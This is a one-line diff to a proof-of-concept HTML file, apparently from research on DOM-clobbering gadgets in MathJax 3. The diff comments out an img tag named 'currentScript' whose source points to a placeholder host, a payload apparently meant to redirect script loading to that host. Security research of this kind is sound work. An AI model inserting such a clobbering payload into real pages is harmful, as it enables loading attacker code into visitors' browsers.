--- a/domc-gadgets-assets/mathjax3/poc.html
+++ b/domc-gadgets-assets/mathjax3/poc.html
@@ -1,4 +1,4 @@
-<img name="currentScript" src="https://xxx.xxx.xxx:3000"></img>
+<!-- <img name="currentScript" src="https://xxx.xxx.xxx:3000"></img> -->
 
 <!DOCTYPE html>
 <html>
